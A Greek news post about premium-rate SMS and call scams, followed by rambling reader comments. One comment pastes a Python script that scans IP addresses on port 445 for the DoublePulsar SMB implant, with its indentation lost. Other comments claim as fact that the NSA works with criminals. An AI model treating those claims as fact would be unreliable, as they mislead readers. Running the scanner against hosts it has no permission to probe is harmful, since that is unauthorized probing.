Βροχή από καταγγελίες δέχονται το τελευταίο διάστημα ενώσεις, καταναλωτών, όπως το ΙΝΚΑ και η ΕΚΠΟΙΖΩ, από αγανακτισμένους πολίτες που ...
«Οι συγκεκριμένες εταιρείες δηλώνουν συνήθως ως έδρα τη Βουλγαρία και την Κύπρο και καλούν μαζικά ή στέλνουν γραπτά μηνύματα σε ανυποψίαστους καταναλωτές. Όποιος κάνει το… λάθος να διαβάσει το sms, να ακολουθήσει κάποιον σύνδεσμο ή να απαντήσει σε κλήσεις που οδηγούν σε ηχογραφημένα μηνύματα, “τιμωρείται” με υπέρογκες χρεώσεις. Έχουμε καταγγελίες ακόμη και για χρεώσεις ύψους 1.000 ευρώ μέσα σε λίγες ημέρες» αναφέρει ο πρόεδρος του ΙΝΚΑ Γιώργος Λεχουρίτης.
Οι επιτήδειοι δρουν με πολλές διαφορετικές μεθόδους, ανάλογα με το… είδος της κομπίνας και το ποσό που επιδιώκουν να αποσπάσουν από κάθε καταναλωτή. «Υπάρχουν τετραψήφιοι - πενταψήφιοι αριθμοί που σε χρεώνουν ακόμη και αν δεν ανοίξεις το μήνυμα. Σε άλλες περιπτώσεις, ο αποστολέας προσπαθεί να δελεάσει το θύμα με δήθεν προσφορές ή διαγωνισμούς για σπίτια και ταξίδια, ώστε ο καταναλωτής όχι μόνο να διαβάσει το μήνυμα, αλλά να δώσει, σε επόμενο στάδιο, και τα προσωπικά στοιχεία του. Κατά μέσο όρο, η χρέωση για κάθε μήνυμα ή κλήση φθάνει τα δύο ευρώ» εξηγεί η νομική σύμβουλος της ΕΚΠΟΙΖΩ Μύρια Βάτζιου.
Σύμφωνα με τις ενώσεις καταναλωτών, το φαινόμενο της εξαπάτησης πολιτών (κυρίως ηλικιωμένων) μέσω τετραψήφιων - πενταψήφιων αριθμών και οργανωμένων τηλεφωνικών κέντρων βρίσκεται σε έξαρση, καθώς οι εταιρείες «φαντάσματα» έχουν βρει τρόπους να κρύβουν τα ίχνη τους.
«Σε μηνιαία βάση δεχόμαστε περισσότερες από 50 καταγγελίες, Ωστόσο, τα κρούσματα είναι πολλαπλάσια. Δεν απευθύνονται όλοι στην ΕΚΠΟΙΖΩ, ούτε αντιλαμβάνονται πάντα τι συμβαίνει, ειδικά όταν η χρέωση είναι μικρή. Οι καταναλωτές πρέπει να ζητούν την επιβολή φραγής στους συγκεκριμένους αριθμούς και να διεκδικούν την επιστροφή των χρημάτων τους από τους παρόχους κινητής τηλεφωνίας» επισημαίνει η κυρία Βάτζιου.
Πηγή: Δημοκρατία
πως αποκτουν προσβαση στα κινητα μας; Μηπωςυπαρχουν σκοτεινες υπογειες στοες μεταξυ παροχων και..."ληστων";
ΑπάντησηΔιαγραφήΠιο κατανοητά ..ΝΑ ΕΙΣΤΑΙ Ο ΚΥΝΗΓΟΣ ΟΧΙ ΤΟ ΘΉΡΑΜΑ
ΑπάντησηΔιαγραφήΔιέρρευσαν Hacking εργαλεία που χρησιμοποιούνται για Hack...Ευάλωτες ΕΊΝΑΙ χιλιάδες ψηφιακές πλατφόρμες..Προσωπικά με ενδιαφέρει, μελετώ αυτά τα εργαλεία διοτι ίσως να έχουν κάτι που έψαχνα η δεν γνωρίζω ...Διέρρευσαν το περασμένο Σαββατοκύριακο...
Θέλω να πω ότι κάτω από {το παγόβουνο του δικτύου} στο σκοτεινό δίκτυο να μην κατεβαίνετε όσοι δεν γνωρίζεται -όσοι δεν έχετε μάθηση- εκεί πας με γνώση ,για να μην πιαστείς κορόιδο..
Υπάρχει εκεί κάτω μια ομάδα - μονάδα από μια ΕΛΙΤ που κάνουν επίθεσης στον κυβερνοχώρο ΚΑΙ που συνδέονται ΚΑΙ με την Εθνική Υπηρεσία Ασφαλείας τον ΗΠΑ την γνωστή και ως NSA .. Εκεί ακούς, βλέπεις τα πάντα ΑΡΚΕΊ να έχεις γνώσης ώστε να μην σε βλέπουν η να σε ακούσουν αυτοί..έτσι μαθαίνεις τα νούμερα {του Τζόκερ τους}.. καμία σχέση με αυτό του τζόγου ..πριν τα κληρώσουν οι εγκληματίας μαζί με της μυστικές υπηρεσίες..αυτονομάζονται ως [ Ομάδα Εξίσωση ]καλό εε!!!..
Πολλοί ερευνητές ασφάλειας έχουν πραγματοποιηθεί μαζικές σαρώσεις στο Internet κατά τη διάρκεια των τελευταίων ημερών και βρέθηκαν δεκάδες χιλιάδες υπολογιστές σε όλο τον κόσμο έχουν μολυνθεί με DoublePulsar... Η υποψία είναι ότι NSA τους κατασκοπεύει με αυτό το εμφύτευμα...
ΚΑΙ ΓΙΑ ΝΑ ΜΗΣ ΣΑΣ ΚΟΥΡΆΖΩ....ΜΠΕΊΤΕ ΔΙΑΒΆΣΤΕ, ΔΕΊΤΕ ΤΑ ΜΕ ΛΊΓΗ ΠΡΟΣΟΧΉ..
ΕΔΩ:: https://www.countercept.com/
ΕΔΩ: https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/
Uros ... Μπουμπουκο βάλε κανένα υποβολέα σου με γνώσης να τα δει εκεί δεν παίζουν.. [[[σου φτιάχνουν ΜΙΑ διπλογραφία και σε κάνουν ΑΣΤΡΟΝΑΎΤΗ]] Το καλό με εμάς είναι ότι γνωρίζομε με υβριδικά συστήματα τα γνήσια ..κατάλαβες η ΌΧΙ;;..ΑΝ ΕΙΣΑΙ ΚΑΘΑΡΟΣ ΜΗΝ φοβάσαι....ΕΙΣΑΙ ΩΜΟΣ!!!
Uros
import binascii
ΑπάντησηΔιαγραφήimport socket
import argparse
import struct
import threading
# Packets
negotiate_protocol_request = binascii.unhexlify("00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
session_setup_request = binascii.unhexlify("00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
tree_connect_request = binascii.unhexlify("00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
trans2_session_setup = binascii.unhexlify("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
# Arguments
parser = argparse.ArgumentParser(description="Detect present of DOUBLEPULSAR SMB implant\n\nAuthor: Luke Jennings\nWebsite: https://countercept.com\nTwitter: @countercept", formatter_class=argparse.RawTextHelpFormatter)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--ip', help='Single IP address to check')
group.add_argument('--file', help='File containing a list of IP addresses to check')
parser.add_argument('--timeout', help="Timeout on connection for socket in seconds", default=None)
parser.add_argument('--verbose', help="Verbose output for checking of commands", action='store_true')
parser.add_argument('--threads', help="Number of connection threads when checking file of IPs (default 10)", default="10")
args = parser.parse_args()
ip = args.ip
filename = args.file
timeout = args.timeout
verbose = args.verbose
num_threads = int(args.threads)
semaphore = threading.BoundedSemaphore(value=num_threads)
print_lock = threading.Lock()
def print_status(ip, message):
global print_lock
with print_lock:
print "[*] [%s] %s" % (ip, message)
def check_ip(ip):
global negotiate_protocol_request, session_setup_request, tree_connect_request, trans2_session_setup, timeout, verbose
# Connect to socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(float(timeout) if timeout else None)
host = ip
port = 445
s.connect((host, port))
# Send/receive negotiate protocol request
if verbose:
print_status(ip, "Sending negotiation protocol request")
s.send(negotiate_protocol_request)
s.recv(1024)
# Send/receive session setup request
if verbose:
print_status(ip, "Sending session setup request")
s.send(session_setup_request)
session_setup_response = s.recv(1024)
# Extract user ID from session setup response
user_id = session_setup_response[32:34]
if verbose:
print_status(ip, "User ID = %s" % struct.unpack("<H", user_id)[0])
# Replace user ID in tree connect request packet
modified_tree_connect_request = list(tree_connect_request)
modified_tree_connect_request[32] = user_id[0]
modified_tree_connect_request[33] = user_id[1]
modified_tree_connect_request = "".join(modified_tree_connect_request)
# Send tree connect request
if verbose:
print_status(ip, "Sending tree connect")
s.send(modified_tree_connect_request)
tree_connect_response = s.recv(1024)
Uros
# Extract tree ID from response
ΑπάντησηΔιαγραφήtree_id = tree_connect_response[28:30]
if verbose:
print_status(ip, "Tree ID = %s" % struct.unpack("<H", tree_id)[0])
# Replace tree ID and user ID in trans2 session setup packet
modified_trans2_session_setup = list(trans2_session_setup)
modified_trans2_session_setup[28] = tree_id[0]
modified_trans2_session_setup[29] = tree_id[1]
modified_trans2_session_setup[32] = user_id[0]
modified_trans2_session_setup[33] = user_id[1]
modified_trans2_session_setup = "".join(modified_trans2_session_setup)
# Send trans2 sessions setup request
if verbose:
print_status(ip, "Sending trans2 session setup")
s.send(modified_trans2_session_setup)
final_response = s.recv(1024)
s.close()
# Check for 0x51 response to indicate DOUBLEPULSAR infection
if final_response[34] == "\x51":
with print_lock:
print "[+] [%s] DOUBLEPULSAR SMB IMPLANT DETECTED!!!" % ip
else:
with print_lock:
print "[-] [%s] No presence of DOUBLEPULSAR SMB implant" % ip
def threaded_check(ip_address):
global semaphore
try:
check_ip(ip_address)
except Exception as e:
with print_lock:
print "[ERROR] [%s] - %s" % (ip_address, e)
finally:
semaphore.release()
if ip:
check_ip(ip)
if filename:
with open(filename, "r") as fp:
for line in fp:
semaphore.acquire()
ip_address = line.strip()
t = threading.Thread(target=threaded_check, args=(ip_address,))
t.start()
Uros
Mastercard παρουσιάζει την επόμενη γενιά βιομετρική κάρτα..
ΑπάντησηΔιαγραφήhttp://newsroom.mastercard.com/press-releases/thumbs-up-mastercard-unveils-next-generation-biometric-card/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Δείτε καλά τι γράφουν ...ΟΜΩΣ [οι μάγκες] Γράφουν από τώρα δακτυλικά αποτυπώματα για να τους {γδύσουν} που θα τα βρουν;; ξέρουν..πως τα γράφουν; με εκτυπωτές υψηλής ευκρίνειας..και ψωνίζεις δωρεάν...κατά την γνώμη μου η αποτυχία θα είναι πολύ γρήγορη ώστε να πάμε στο γραμμικό {αυτό που κάποιοι λένε χάραγμα} άλλα κρατάνε δέκα κινητά νέας γενιάς.. Το γραμμικό θα έλθει με το δε(σ)οξυριβονουκλεϊ(νι)κό οξύ (Deoxyribonucleic acid Η ΑΠΛΑ DNA...
Καλός ήλθατε στην ψηφιακή εποχή...όσοι δεν το κατανοήσουν γρήγορα θα ταλαιπωρηθούν με θρησκευτικά κωλύματα, ανθρωπινά δικαιώματα [αυτά τα είχε μόνο η ΕΛΙΤ για να κρύβετε ] κ.τ.λ ....προχωράμε άγρα προς στο ΦΩΣ άλλα θα φτάσουμε..
Uros..